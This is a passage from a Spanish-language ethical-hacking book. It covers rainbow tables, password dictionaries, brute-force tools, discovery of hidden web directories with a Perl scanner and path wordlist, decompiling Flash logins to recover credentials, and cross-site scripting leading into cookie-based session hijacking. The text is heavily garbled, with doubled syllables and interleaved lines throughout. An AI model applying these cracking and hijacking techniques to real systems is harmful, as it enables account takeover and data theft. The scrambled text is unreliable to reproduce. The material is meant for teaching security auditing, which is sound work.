caso de escribir un script y utilizarlo localmente. Es muy posible que, para sacarse una duda lo haya escrito rápido, sin elegancia o el mejor pulido código de programación. 10.  La falta de entendimiento o de comprensión por parte del ejecutor:  P  Paara emplear esta técnica hay que saber dónde, cómo, con qué y durante cuánto tiempo hacerlo. Hay que tener en cuenta las probabilidades, los factores, conocer características del objetivo y tener algunos conocimientos técnicos previos y la diferencia entre tipos de hashes, cifrados y archivos (más adelante veremos cómo extraerlos), entre otros. Hay que tener bien en claro los empleos y la orientación de la FB.

Rainbow Tables Las tablas Rainbow son tablas binarias pregeneradas para ser utilizadas por programas que, bajo una forma específica del concepto Time-Memory Trade-Off ligado al criptanálisis, son empleadas para encontrar passwords con una alta performan-

Informaci Info rmación ón adici adicional onal

En esta obra no encontraremos detalles de algoritmos de cifrado (debilidades puntuales de éstos éstos), ), de progr programació amación n de bajo nivel (avanzada), (avanzada), de teorí teorías as cuánticas ni histo histo-ria o matemática pura. Para ello, es recomendable visitar el excelente sitio www.criptored.upm.es o los foros de www.kriptopolis.org.

128

 

ce. Muchas veces lo hacen más rápido que un generador normal brute force tipo LC5, aunque se tarda bastante en generar estas tablas previamente. Además, suelen ser muchos gigas, dependendiendo del charset elegido. El concepto lo mejoró Philippe Oechslin, ya que existe desde hace más de 20 años gracias a Martin Hellman, y lo describe en detalle en el artículo publicado en lasecwww.epfl.ch/pub/lasec/doc/Oe lasecwww.epfl .ch/pub/lasec/doc/Oech03.pdf. ch03.pdf. En https://www.isc2 https://www.isc2.org/cgi-bin/ .org/cgi-bin/ content.cgi?page=738 detalla las rainbow tables y en www.objectif-securite.ch/re search/websec06.pdf, las ecuaciones del algoritmo.

Instantáneo.  Decryptum es un sitio que descifra un documento

Word en segundos. Para hacerlo, utiliza un mecanismo basado en rainbow tables. Cualquier documento Word con password de open podrá ser descifrado y posteriormente abierto, más allá del password que haya tenido.

Los programas que se utilizan en la actualidad son muchos, pero los más comunes -nombradas antes- son el original Ophcrack (http://ophcrack.sourceforge.net, es muy recomendable leer su Help para conocer algunos consejos), RainbowCrack  (www.antsight.com/ zsl/rainbowcrack/) y Cain & Abel (www.oxid.it/cain.html). Estos programas pueden ser utilizados bajo Windows o Linux y sirven para atacar

hashes bajo cifrados de diferentes tipos, como LM, md5, SHA1 y otros. Son realmente rápidos, ya que tardan muy pocos segundos o minutos. Podemos encontrar una nota interesante en www.codinghorror.com/blog/archives/000949.html.  Ahoraa bien, ¿cómo podemo  Ahor podemoss obten obtener er Rainb Rainbow ow Tables Tables?? Podemo Podemoss gener generarlas arlas (en  www.antsight  www.an tsight.com/zs .com/zsl/rain l/rainbowcr bowcrack/rtg ack/rtgen_cfg en_cfg5.txt 5.txt encon encontramos tramos la lista de co129

 

mandos para generar tablas rainbows sobre el charset [ABCDEFGHIJKLMNOPQRSTUVWXY NOPQRS TUVWXYZ0123 Z012345678 456789!@#$% 9!@#$%^&*()^&*()-_+= _+= ] del program programaa Rainbow Rainbow-crack; en este caso poco más de dos meses con un micro Pentium 4 de 2.8 Ghz), podemos desdecwww.epfl.ch/SSTIC04-5k una red P2P o de sitios como moo.com,bajarlas http://lasecwww.epfl.c http://lase h/SSTIC04-5k.zip, .zip, http://rainbowtables.shwww.freerainbowtableswww.freerai nbowtables.com y www.thepiratebay.org/search/Rainbow%20Tables; podemos comprarlas en DVD en http:/ http://sarca /sarcaprj.wa prj.wayreth. yreth.eu.org eu.org y www.ob www.objecti jectif-secu f-securite.c rite.ch/ h/ en/contact.php, o bajarlas desde algun cliente para torrents.

Diccionarios Por el año 2001, dí a los lectores de una lista de correo que por aquel entonces moderaba, un archivo que contenía palabras deniminado   510.000 passw passwords ords usualmente usualm ente utiliz utilizados ados en Argen Argentina. tina. Ese material todavía está disponible para descargar, con la diferencia de que en la actualidad, la cifra de palabras asciende a una cantidad de  7.414.572, una nada despreciable colección, que me ha ahorrado mucho tiempo en las auditorias de passwords. Para obtenerlo, hay que descargarlo de  www.hackingetico.com/di www.hackingetico.com/diccionario.zip ccionario.zip (gracias (graci as a  www.mesi.com.ar  -ISO 9001- por el hosting). El archivo posee clave y, para conocerla, hay que darse de alta en la lista: http://www.elistas.net/lista/nnl/alta  , de ese modo les llegará automaticamente un correo de bienvenida con dicha clave. Este diccionario fue creado a través del tiempo coleccionando listados de palabras, generándolas o escribiéndolas a mano, tomándolas de grandes repositorios públicos, más otros archivos que han confeccionado colegas, allegados y anónimos. Hay  también claves comúnmente utilizadas de perfiles variados y un resto de palabras proveniente de todo tipo de base de datos. El material se depuró con la aplicación  TextPad, de Helios Software Solutions (  www.textpad.com ).

Herram Her ramien ientas tas FB

No hay dudas de las bondades de PGP como herramienta para cifrar nuestros archivos y correos. Aun así, si nuestros passwords son muy débiles, mediante fuerza bruta es posible descifrar esos archivos. Existen algunas herramientas, como las que podemos encontrar en www.elcomsoft. com/edpr.html y www.accessdata.com.

130

 

Contenido del archivo El fichero diccionario.zip, contiene un archivo de texto de 74 megas (diccionario.txt) y un archivo .bat que cuando lo ejecutemos, generará lo siguiente: • Un diccionario.lst para utilizarlo con John the Ripper. • Un diccionario.dic para utilizarlo con LC5. • Un archivo diccionario sin extensión que podrá ser utilizado con aplicaciones como Hydra u otros programas y sistemas operativos.

Auditor.  Medusa

(www.foofus.net/jmk/medusa/medusa.html) es otra aplicación para realizar brute force sobre servicios de un

servidor. Sus autores afirman que es más estable que Hydra, de THC.

Documentos técnicos  www.secuwiki.com http://his.sourceforge.net/trad/ http://akira.azul.googlepages.com/sabuesos.pdf  http://blackhat.com/html/bh-multimedia-archives-index.html  www.security-freak.net

131

 

www.packetstormsecurity.org

Éste es un rep Éste reposi ositor torio io contin continuam uament entee act actual ualiza izado do sob sobre re herram herramien ientas tas de segur se gurid idad, ad, no noti tici cias as de in inci cide dent ntes es in info form rmát átic icos os,, te text xtos os,, av avis isos os,, ex expl ploit oits, s, artículos los más archivoso relacionados. Existe hacetiempo muchos añoslasy es posibley ver tantodiversos herramientas técnicas de hace algún como

más nuevas.

132

 

5 > Aplic. Web

Descu Des cuido idos s y vu vulne lnera rabil bilid idade ades s más comu co mune nes s li liga gada das s a la las s ap apli lica caci cion ones es webs. web s. Pr Princ incipa ipalm lment ente, e, aq aquel uello los s que

nace na cen n de debi bido do a un una a de defi fici cien ente te programación, programaci ón, implement implementación, ación, admi ad mini nist stra raci ción ón de del l se serv rvid idor or o bi bien en de del l cont co nte ext xto o en el que se enc ncu uen entr tra a la apli ap lica caci ción ón. . Se ve verá rán n me meto todo dolo logí gías as de form fo rma a mu muy y cl clar ara, a, de deta tall lles es té técn cnic icos os, , herra her ramie mient ntas as e imá imágen genes es int intere eresan sante tes. s.

 

 APLICACIONES IONES ONLINE  APLICAC En una internet cada día más orientada a brindar servicios al visitante de sitios web, es de esperar que un gran númer número o de éstos tenga tengan n aplic aplicacion aciones es corriendo. corriendo. Muy lejos estamos de los estáticos sitios html con letras  Times New Roman que había en los años 90. Estas aplicaciones web hicieron que el desarrollo de un sitio interactivo, con bases de datos y diversos scripts, ya no sea obra de un diseñador o un usuario común, sino de un programador con el soporte de un administrador o equipos de trabajo que participan forma conjunta para su desarrollo y mantenimiento. Muchos deen estos sitios tienen descuidos en programación y de administración, y no hablamos de blogs personales ni de aquellos sitios particulares en donde reina la estética (diseño a la vista) en un formato estático, sino de webs de organizaciones e instituciones que ya están, de alguna forma, en lo que es llamado Web 2.0 o red social.

Si estos sitios están vulnerables, de algún modo exponen información o datos. Como una de las metas del hacking ético es encontrar esas brechas antes de que un atacante real lo haga, en nuestra tarea como profesionales éticos la clave es buscar, interpreta inter pretar, r, anali analizar, zar, generar errores y revis revisar ar de modo inten intensivo, sivo, hasta encont encontrar. rar. No todo lo encontrado puede ser explotable, pero podría ser una muy buena pista para dar con algo sensible, o bien, mejorar la seguridad. Veamos cuáles son algunos de estos descuidos genéricos y las técnicas de intrusión más comunes ligadas a ellos.

Directorio.   Penetration

Testing directory project

(www.penetration (www.penetr ationtests.c tests.com) om) es un reposi repositorio torio de direc direcciones ciones relacionadas al mercado del chequeo de la seguridad. 134

 

Directorios y archivos ocultos Un webmaster (sea programador, diseñador o administrador) encargado del sitio de la empresa puede dejar, aunque sea por unas noches, una carpeta en el host llamada backup (  www.sitioweb.com/backup ). Es muy probable que un intruso la encuentre rápido, ya sea con escáneres o por Google, o quizá sea vista por un empleado del lugar, algo que sucede bastante a menudo. Los directorios que no están disponibles para el público son de mucho interés para el intruso ya que allí puede existir un atajo o material sensible para lograr una intrusión, trusió n, o bien, conseguir conseguir la meta (o parte parte)) propuesta sobre el objeti objetivo. vo. Esos direc-

torios pueden encontrarse de varia variass formas formas:: •  A ciegas, con un escáner o script:  un ejemplo es el de las herramientas que chequean los CGI files y paths (directorios) más comunes. Podemos ver una lista de estas utilidades en  www.blackhat.be/cst/big.db. •  Por lógica o deducción, alineando un escáner al objetivo o a mano:  un simple script escrito en Perl que se encargue de leer una lista de palabras seleccionadas tipopath de objeti objetivo vo para que, automá automática ticamente, mente, las vaya(recordemos probando enlos el hostsegún y digaelqué es coincidente con la palabra allí presente tips del Capítulo 2 –Escaneo y fingerprinting– sobre vulnerability scanning). •  Siguiendo el mapeo del sitio o los links, e intentando encontrar browsing directory en alguno de los paths que existen. Hay utilidades que mapean el sitio o lo bajan completamente para que luego podamos analizarlo offline con tranquilidad y así ver la totalidad de los links y la estruct tru ctura ura mis misma ma del sit sitio, io, por ej ejemp emplo lo We WebZI bZIP P (lo pod podem emos os enc encont ontrar rar en la dirección www.spidersoft.com/webzip/). Supongamos que el sitio tiene la aplicación instalada en   www.sitioweb.com/clientes/stock/pedidos/carrito/com pra. asp?id=61 . A mano mano,, trat tratarem aremos os de ver el cont contenid enido o de: • www.sitioweb.com/clientes/stock/pedidos/carrito/ • www.sitioweb.com/clientes/stock/pedidos/ CGI CGI  ( Common Gateway Interface )

es una importante tecnología de la   World Wide Web  que permite a un cliente (explorador web) solicitar datos de un programa ejecutado en un servidor web. CGI especifica un estándar para transferir datos entre el cliente y el programa. Es un mecanismo de comunicación entre el servidor web y una aplicación externa. Fuente: Wikipedia.

135

 

• www.sitioweb.com/clientes/stock/ • www.sitioweb.com/clientes/ Recordemos que, haciendo la petición http de estas diversas maneras, podemos llegar a obtener diferentes resultados: • www.sitioweb.com/clientes/ • www.sitioweb.com/clientes

• http://sitioweb.com/clientes/ • http://sitioweb.com/clientes • https://sitioweb.com/clientes  Además , tengamo  Además, tengamoss en cuenta que no es lo mismo poner un URL que dé error de sistema en Firefox 2.0 que en Internet Explorer 7.0, instalado por defecto. En el primero, se verá bien el error.

Mensaje. Error del gestor de databases mostrado a través del browser Firefox.

En cambio, en Internet Explorer sólo se verá el Status Code 500, correspondiente

Erro Er rore res s de es esta tatu tus s Los famosos Status Code Definitions números 404, 403, 200 que aparecen luego de nuestras peticiones http están declarados y detallado detallados s en   www.faqs.org/rfcs/rfc2616.html. Existen de cinco clases: los del rango 100 son informativos, los del 200 son peticiones exitosas, los del 300 son redirección, los del 400 son los de error del cliente y los del rango 500 son de errores del servidor.

136

 

a un er errror de si sist stem emaa, alg lgo o qu quee no brin inda da dem emaasi siad adaa in info forrma maci ció ón.

Interrne Inte nett Ex Expl plor orer er 7.0 no mu mueestr traa el erro rorr del ge gest stor or de da data taba basses. Po Pode dem mos acti ac tiva varl rlo o de desd sdee el me menú nú He Herra rramien mienta tas/Op s/Opcio ciones nes de Inter Internet net.. Una vez allí, en Op Opcio ciones nes avanza avan zadas das,, hay que destil destildar dar la opción opción Mos Mostrar trar mensa mensa jes de error HTTP descrip descripti tivos vos.. Error.



 Viéndolo  Viéndo lo direc directa tamen mente te gracias gracias a browsing browsing direc directory: tory: browsing browsing direc directory tory es cuancuando pode podemos mos ver el conte conteni nido do de un direc directo torio rio onli online. ne. Es posi posible ble empe empezar zar con inindex of / y mostrar mostrar la lista lista de archi archi vos  vos u otras carpe carpetas tas que pueden pueden tener tener dentro. dentro.

El direc directory tory brows browsin ing g habi bili lita tado do permi permite te ver el conte conteni nido do de los direc directo torios, rios, tanto carpe tanto carpetas tas como como archi archivos vos y, por tanto, tanto, acce acceder der a ellos o a la infor in forma mación ción allí conte conteni nida, da, Paths.

137

 

según se gún el atribu atributo to que tenga tenga en los archi archivos vos o en el lengua lengua je que esté esté progra programa mado. do.

•  A tra vés del con conte teni nido do de www.si www.sitio tio web  web.com .com/ro /robots.txt: bots.txt: Hay quienes quienes toman toman el recau re caudo do de listar, listar, en el archi archi vo  vo robots.txt, robots.txt, los paths y direc directo torios rios que no quiere quiere que Google Goo gle y otros busca buscado dores res inde indexen xen a su motor motor de búsque búsqueda. da. Sin embar embargo, go, no tietienen en cuenta cuenta que de esta esta mane manera ra le están están dando dando infor informa mación ción fácil fácil a un posi posible ble inintruso. tru so. •  A tra vés de algu al guna na inde indexa xación ción del ti po  po Google Google o alma almace cena namien miento to a modo modo de mirror mirror (es pe  pejo), jo), caché caché o du pli  plica cado do de sitio. sitio. • Des Desde de el sitio sitio de la em pre  presa sa que desa desarro rrolló lló la aplica aplicación: ción: Es decir, decir, si se puepuede bajar bajar una demo demo o la aplica aplicación ción comple completa, ta, se puede puede insta instalar lar y anali analizar zar qué tipo tipo de direc directo torios rios y archi archi vos  vos po posee see la aplica aplicación ción o cómo cómo puede puede explo explotár társe sela. la. Esta Esta prácti prác tica ca se suele suele deno denomi minar nar clo clona nado do de contex contexto to e impli implica ca conse conseguir guir la misma misma aplica apli cación ción e insta instalar larla la en el mismo mismo siste sistema ma opera operati ti vo  vo pa p ara ver cómo cómo es su admi admi-nistra nis tración, ción, sus paths y sus archi archi vos,  vos, su esque es quema ma de segu seguri ridad dad (cómo (cómo se loguea loguea el admin, ad min, cómo cómo se guardan guardan sus pass words, cómo cómo y dónde dónde se actua actualiliza, za, cómo cómo se parparchea, archi archi vos  vos por de defec fecto to en insta instala lación, ción, etcé etcéte tera). ra). Antes Antes de hacer hacer todo todo eso, concon viene  vie ne leer el manual manual de usuario usuario o un datas datasheet heet de espe especi cifi fica cacio ciones nes técni técnicas, cas, ya que el intru intruso so hasta hasta puede puede tratar tratar de anali analizar zarla la en otro sitio sitio que utili utiliza za la misma misma apliaplicación, ca ción, pero pero con menos menos medi medidas das de segu seguri ridad dad de entor entorno no aplica aplicadas. das. Los archi archi vos  vos en estos estos direc directo torios rios pueden pueden conte contener ner confi configu gura racio ciones, nes, backups backups de totodo tipo, tipo, scripts con las más di versas  versas funcio funciones nes (upload.php o upload.asp upload.asp para para susubir archi archi vos  vos al ser ver, entre entre otros).  También  Tam bién se lo llama llama Di Direct rect Access Access o Di Direct rect Request Request cuan cuando do se acce accede de direc directa ta-men mente temerce a uncepath oron a un arlla archi chi vo  de vo que, de laalaplica apli cación ción insegu inse gura. ra.teMuchas Mu chas apli aplica cacio dee-commer e-com tu vie  vieron la falla fa llamar llamar directa direc tamen mente a su databa data base seciones denes clien clientes, ésta ésta podía podía ser baja bajada da sin proble problemas. mas. En  www  www.pac .packets ketstorm tormse secu curit rit y.org/U  y.org/UNIX/c NIX/cgi-scan gi-scanners ners/Webr00t.pl /Webr00t.pl, pode pode-mos encon encontrar trar una utili utilidad dad que busca busca secuen secuencial cialmen mente te direc directo torios rios y archi archi vos  vos de sisitios y tiene tiene varios varios años (está (está escri escrita ta en Perl). Es útil para para fami familia liari rizar zarse se con este este titi-

 Arc rchi hiv vos co comp mpri rim mid ido os Para los usuarios Para usuarios de Windows, Windows, 7-Zip es una aplica aplicación ción que permite mani manipu pular lar archi archivos vos compri compri-midos mi dos en muchas muchas exten extensio siones nes (gz, tar.gz, tar, zip, rar) y con mayor mayor perfor performan mance ce que los compre compre-sores so res y decom decompre preso sores res más usuales. usuales. El sitio sitio de esta esta aplica aplicación ción es www.7-zi www.7-zip.or p.org/es/ g/es/.

138

 

po de herra herramien mientas tas de línea línea de coman comandos dos alta altamen mente te custo customi miza zables bles (adapta (adaptable ble tantanto en funcio funciona namien miento to como como en lo que busca). busca). Una buena buena idea es ver si pode podemos mos mejo me jorar rarla, la, agregar agregarle le pala palabras bras rela relacio ciona nadas das con obje objeti ti vo  vo del tipo. ti po. Por ejemplo: ejemplo: /proyecttos/ /proyec /clienttes/ /clien /lista /lis tad dos/ /pri vad  vado/ /backkup/ /bac /geren /ge rentte/ /usuarrios/ /usua /viejjo/ /vie /borrrar/ /bo /ingre /in gresso/

/intra tran net/ /martin/ /data taba basses/ /archi vos/  vos/ /respal pald do/ /webmas mastter/ /admin/ /panel/ /mails/ /db/

/carlos/ /poliliti ticcas/ /datos/ /docu /do cumen menttos/ /ser vid  vidor/ /planea neamien mientto/ /estra trate teggia/ /docs/ /grabar/ /secre cretto/

/eduardo/ /acce cesso/ /cuentas/ /data/ /inclu clud des/ /gusta vo/ /confi fiden denccial/ /inter tern no/ /memos/ /copia/

/impor portan tante/ te/ /bkp/ /correos/ /juan/ /app/ /config/ /con fig/ /asp/ /web/ /source/ /nombre bread admin/ min/

¿Cómo la ejecu ¿Cómo ejecuta tamos mos en Windows? Windows? Muy fácil. fácil. Insta Instala lamos mos un intér intérpre prete te de Perl como co mo Acti Acti vePerl,  vePerl, que podemos descargar desde la dirección  ww w.ac  w.acti ti vesta  ves tate. te. com/sto com/s tore/ac re/acti ti ve  ve perl  perl/down /download/ load/. Allí basta basta con hacer hacer click en Conti Continue nue sin llenar lle nar los campos campos para para bajar bajar la versión versión que desee deseemos. mos. Luego Lue go de insta instalar lar Perl, deja dejamos mos el escá escáner ner en C:\Perl C:\Perl\bin \bin y ejecu ejecuta tamos mos CMD.e CMD.e-xe en Windows. Windows. Una vez que estamos en el prompt MS-DOS, nos movemos hashas ta ese path y lo ejecu ejecuta tamos mos de la siguien si guiente te mane manera: ra:

C:\ C: \Pe Perl rl\b \bin in>p >per erl l We Webr br00 00t. t.pl pl -h ww www w.web .website site. .co com m -o re resu sul ltado.txt Ok here we go ... Host Ho st: : ww www. w.we webs bsit ite. e.co com m Outp Ou tput ut: : re resu sult ltad ado. o.tx txt t Ver Ve rbo bose se: : OFF Audio: OFF Interactiv Interacti ve: OFF Using: Usi ng: Dir Direct ectory ory Dis Discov covery ery StartDir: / Sear Se arch chin ing g for for di dire rect ctor orie ies s .. ... . 1 : / => 200 OK 2 : etc

Si desea deseamos mos algo algo mucho mucho más rápi rápido do y nue vo, pode podemos mos utili utilizar zar el módu módulo lo de AcuAcunetix ne tix (ww w.a  w.acu cune netix tix.com). .com). Otra herra herramien mienta ta muy buena buena para para hacer hacerlo lo es nikto nikto 139

 

(www (www.cirt .cirt.net .net/co /code de/nik /nikto.shtml) to.shtml) o también también pode podemos mos progra programar mar un script propio. propio. Este Es te ejemplo ejemplo es para para aquellos aquellos que recién recién están están empe empezan zando. do.

Pantalla Panta lla de la shell en donde don de se testea testea Nikto Nikto 2.0 (sobre (so bre FreeBSD 5.5). Aquí se termi termina na de hacer hacer un chequeo chequeo de direc directo torios, rios, archi ar chivos vos CGI y otros sensi sensibles bles de casi casi 3000 ítems en menos menos de 7 minu minutos. tos. Nikto.

Inge In genie niería ría inver inversa sa sobre sobre Flash Como claro Como claro ejemplo ejemplo de inge ingenie niería ría in ver  versa sa (desar (desarmar mar y anali analizar zar para para ver cómo cómo está está hecho he cho o cómo cómo funcio funciona), na), la lle va  vare remos mos a cabo cabo sobre sobre una de las tecno tecnolo logías gías más utiutililiza zadas das en sitios sitios webs diná dinámi micos. cos. Un archivo de Adobe Flash es fácil fácil de descom descompi pilar lar si contamos con la herra herramien mien-ta adecua adecuada, da, y así vere veremos mos cómo cómo conse conseguir guir infor informa mación ción sensi sensible ble de un sitio sitio meme-

Esc Es cáner en lí línea

Si quere queremos mos tener tener más alter alterna nati tivas, vas, pode podemos mos probar probar un escá escáner ner onli online ne de los links que contie contiene ne un sitio. sitio. Para Para eso, en www.el www.elsop sop.com .com/q /qui uick ck// en encon contra trare remos mos LinkScan LinkScan-/QuickCheck. /Quick Check. Además, podemos descargar una versión de prueba del programa.

140

 

diante esta diante esta técni técnica ca liga ligada da al infor informa mation tion gathe gathering. ring. Es muy común común que las orga organi ni-zacio za ciones nes e insti institu tucio ciones nes utili utilicen cen pelí pelícu culas las o partes partes de su sitio sitio en Flash, por ejemplo ejem plo en menús, menús, presen presenta tacio ciones, nes, formu formula larios, rios, acce accesos sos y links semies semiestá táti ticos. cos.

LoginID. Clá Clási sico co y arriesga arriesgado do acce acceso so de vali valida dación ción en Flash para para la compro comproba bación ción de usuario usuario y password. password.

Hay mucho mucho más que esté estéti tica ca 3D o mó vil de detrás trás de esas anima animacio ciones. nes. Descom Descompi pi-lando lan do este este tipo tipo de archi archi vos  vos de exten extensión sión .swf (appli (applica cation/x-shock tion/x-shock wa ve-flash comcompila pi lado do y compri comprimi mido) do) podemos encontrar datos como los siguientes: • Li Link nkss ocu oculltos • Casi sillas llas de correo correo • Usuarios • Cla ves • Archi vos  vos ocultos

• Direc Directo torios rios ocultos ocultos • Nombres • Varia riables bles • Comentarios de código con información personal • Otro titipo de infor informa mación ción rela relacio ciona nada da con el obje objeti ti vo,  vo, que nos pue puede llegar llegar a serser vir. Para estos Para estos dos ejemplos ejemplos que vere veremos mos a conti continua nuación, ción, usare usaremos mos SWF Decom Decom pi  piler ler de la empre empresa sa Sot Sothink  hink . Este Este tipo tipo de soft ware  ware se creó, en un princi principio, pio, para para vol ver  ver las ani ani-macio ma ciones nes (.swf) a un forma formato to edita editable ble (.fla). Pode Podemos mos testear testear el soft ware  ware desde desde  www.. sothink  www sothink.com .com/pro /product duct/flash /flashde decom com pi  pile ler/in r/index.htm dex.htm. 141

 

Una vez insta instala lado do el progra programa, ma, entra entramos mos en la web que contie contiene ne la pelí pelícu cula la Flash que quere que remos mos descom descompi pilar lar y la guarda guardamos mos en Fire Firefox fox entran entrando do en el ítem del menú menú Ar  Archi vo  vo

y luego luego en Guar Guardar dar como... como...

El archi archivo vo Flash hace hace la compro comproba bación ción de los datos datos intro introdu duci cidos dos y, si son inco incorrec rrectos, tos, nos devuel devuelve ve a la misma misma pági página na sin error o cartel cartel algu alguno. no.

Validando.

Entonces, para continuar, abrimos abri mos el archi archi vo  vo login.swf lo gin.swf que descar des carga gamos mos a nuesnuestra máqui máquina na con el SWF Decom De compi piler. ler.

142

 

Inversa.

Inter In terfaz faz gráfi gráfica ca del descom descompi pila lador. dor. Auto Automá máti tica camen mente, te, en el menú menú

de la dere derecha, cha, apare aparecen cen todas todas las seccio secciones nes del archi archivo vo ya descom descompi pila lado. do.

Lo que nos inte intere resa sa a noso nosotros tros es aquello aquello que se encuen encuentra tra en la sección sección Action, Action, ya que allí están están decla declara radas, das, en el códi código go fuente, fuente, las accio acciones nes que reali realiza za el archi archi vo  vo Flash con la infor informa mación ción que se le brinda. brinda.

El códi código go fuente fuente de la pe pelí lícu cula la Flash del acce acceso so muestra muestra los links inter internos nos del  sitio con sus respec sitio respecti tivas vas claves claves de acce acceso so y usuarios usuarios asigna asignados dos a cada cada una de las direc direccio ciones. nes. Source.

Lógica Lógi camen mente, te, no todos todos los archi archi vos  vos .swf .swf entre entregan gan tanta tanta infor informa mación. ción. A veces, veces, suelen suelen dar links inter internos nos sola solamen mente, te, y está está en noso nosotros tros encon encontrar trarle le o sacar sacarle le pro ve  vecho cho con: • Submits vía POST.

¿Qué es una cookie? Una coo cookie kie es infor informa mación ción que guarda guarda una pági página na en nuestro nuestro disco. disco. Así, cuando cuando abrimos abrimos una sesesión de nuestra nuestra casi casilla lla de correo, correo, no tene tenemos mos que poner poner en cada cada pági página na nuestro nuestro usuario usuario y clave clave porque por que ya se encuen encuentran tran en la cookie cookie y el servi servidor dor los recu recupe pera ra en cada cada peti petición. ción. Si un intru intruso so roba ro ba nuestra nuestra cookie cookie y la usa rápi rápido, do, podría podría entrar entrar en nuestra nuestra casi casilla lla aun sin saber saber la password. password.

143

 

•• G neran ne rando erroproba errores. res.bacio Haeciendo cien dodocompro com ciones nes de datos datos de deter determi mina nadas das varia variables bles auto automa matitiza zadas das (compro (com proba bación ción de usuarios usuarios de siste sistema ma existen existentes, tes, por ejemplo). ejemplo). Intrusos Intru sos osados osados pueden pueden llegar llegar a hacer hacerse se pasar pasar por los dise diseña ñado dores res o admi adminis nistra trado do-res (sabien (sabiendo do ese tipo tipo de datos datos no públi públicos) cos) para para obte obtener ner cla ves FTP o Shell de de sissistema. te ma.  Veamos  Vea mos el segun segundo do ejemplo. ejemplo. Éste Éste es el códi código go fuente fuente de otro sitio sitio que, al decla declarar rar la función función identi identifificar carse(), se(), deja deja ver el link en donde donde se comprue comprueba ba ese login login (www(www. sitio sitio web  web.co .com/a m/apli plica cacio cion/I n/Iden dentitifificar carse.php). se.php). Si las funcio funciones nes son varia variadas, das, nos dadará bastan bastantes tes URLs inter internos nos como como para para anali analizar, zar, entre entre otros datos. datos.  —8< functi func tion on id iden enti tificarse() ficarse() { var iden = new LoadVars(); iden.usu = root.Usuario;

iden.c iden .con on = _r _roo oot. t.Co Cont ntra rase seña ña; ; iden.sendAndLoad(“I iden.sendAndLoa d(“Ident dentific ificarse arse.php .php”, ”, iden iden, , “POS “POST”); T”); iden.onLoad = function () { if (i (id den. n.A Auto tor riz iza ado == “si “si”) { iden.Autorizad iden.Autoriza do = “no”; _root.entrandojuego(); _root.en trandojuego(); } else { _root.entradanovalida(); } // end if };

Compra de exploits Oday Empre Em presas sas como como Tipping TippingPoint, Point, iDefen iDefense, se, Immu Immunity nity y Netra Netragard gard compran compran exploits exploits 0day a los proprograma gra mado dores res y los mantie mantienen nen en priva privado. do. Si nos inte intere resa sa desa desarro rrollar llar este este tipo tipo de progra programas, mas, Buffer Overflow Overflow Study - Attacks Attacks & Defen Defenses ses, In Intro troduc duction tion to Shellco Shellcode de - How podemos leer A Buffer to exploit exploit buffer buffer overflows overflows y Wri Writing ting Secu Security rity Tools and Exploits Exploits, entre otros libros.

144

 

} // End of the function  —8<

Dejar de reco Dejar recomen mendar dar la utili utiliza zación ción de Flash por el riesgo riesgo de ser vícti víctima ma de este este titipo de análi análisis sis es muy extre extremo, mo, ya que existen existen solu solucio ciones, nes, como como Amaye Amayeta ta SWF Encrypt, para para miti mitigar gar el proble problema ma (   ww w.a  w.ama ma ye  yeta ta.com .com/soft /soft ware/sw  ware/swfencrypt/ fencrypt/ ).

 XSS O CROSSCROSS-SI SITE TE SCRIPTING SCRIPTING Se deno denomi mina na XSS a la técni técnica ca que permi permite te inyec inyectar tar códi código go (tags) HTML o ja vas  vas-cript, por ejemplo, ejemplo, en una aplica aplicación ción o siste sistema ma en el que no se esté esté correc correcta tamen mente te  valilida  va dado do para para poder poder así ejecu ejecutar tarse. se. Veamos Veamos un claro claro ejemplo ejemplo gráfi gráfico: co:

Aquí vemos vemos cómo cómo se ejecu ejecuta, ta, en nuestro nuestro explo explora rador dor Fire Firefox fox sin noScript, noScript, la porción porción de códi código go “a “alert(“[XSS]”)”” ag agre rega gado do al URL del busca buscador dor del sitio sitio del diario diario Clarín. Clarín.

XSS.

 Aunque el cartel  Aunque cartel que se muestra muestra pare parece ce inofen inofensi si vo,  vo, la técni técnica ca en sí no lo es. Lo que hici hi cimos mos fue sólo sólo una compro comproba bación ción de la vulne vulnera rabi bililidad dad del sitio sitio ante ante esta esta técni técnica, ca, que puede puede utili utilizar zarse se para para realizar actividades como: • Robar cookies cookies y, de ese modo, modo, sesio sesiones nes o lo equi valen  valente te a entrar entrar en una casi casilla lla de HotHotmail, o cualquie cualquiera ra que utili utilice ce el meca mecanis nismo mo cookies cookies de sesión, sesión, sin cono conocer cer la cla ve  ve.. 145

 

• Usar Usar al vi visi sitan tante te como como proxy para para algún algún ataque ataque vía http remo remoto. to. • Robar nombres de usuarios usuarios y sus contra contrase señas ñas a tra vés de for formu mula larios rios dise diseña ñados dos espe es pecial cialmen mente te por el intru intruso. so. • Redi direc reccio cionar nar auto automá máti tica camen mente te o hacer hacer que el browser browser del visi visitan tante te reali realice ce algu algu-nos compor comporta tamien mientos tos que quiere quiere el intru intruso/e so/eje jecu cutor. tor. • Obte tener ner el pass word del ad admi minis nistra trador dor de foros foros y sitios sitios vulne vulnera rables. bles. • Realilizar zar phishing, phishing, fraudes fraudes onli online ne y esca escala ladas das en intru intrusio siones nes de alta alta comple complejijidad. dad.  Veamos  Vea mos ahora ahora un ejemplo ejemplo simple simple de session session hijac hijacking king (a tra vés de la extrac ex tracción ción de cookies, coo kies, esta estable blecer cer una sesión sesión en una casi casilla lla de correo correo como como si fuéra fuéramos mos la vícti vícti--

ma). Este Este ejemplo ejemplo también también funcio funciona naba ba en Hotmail Hotmail hasta hasta que, hace hace unos meses, meses, la gente gen te de Micro Microsoft soft mudó mudó casi casi la tota totalilidad dad de las casi casillas llas a Windows Windows Li ve  ve y ya no es posi po sible ble repro reprodu ducir cirlo lo como como antes. antes. Si bien se pueden pueden aún tomar tomar las cookies cookies de una sesión sesión en Hotmail Hotmail (MSN tiene tiene mumuchos sitios sitios vulne vulnera rables bles a XSS), en la actua actualilidad dad sólo sólo funcio funciona na en aquellas aquellas que no se han pasa pasado do a la nue va tecno tecnolo logía gía (casi (casillas llas Hotmail Hotmail abiertas abiertas hace hace muchos muchos años) con otros méto métodos dos de segu seguri ridad dad y compro comproba bacio ciones nes aplica aplicados. dos. ¿Qué nece necesi sita tamos mos para para el ejemplo? ejemplo? Supon Suponga gamos mos que deci decidi dimos mos compro comprobar bar la seseguridad guri dad de una deter determi mina nada da casi casilla lla de ww w.ub  w.ubbi bi.com, .com, que perte pertene nece ce a un geren gerente te de siste sistemas mas ya que esta estamos mos contra contrata tados dos en un proyec proyecto to de segu seguri ridad. dad. Un punto punto por compro com probar bar es ver de qué modo modo impac impacta ta la inge ingenie niería ría social social dentro dentro de la orga organi 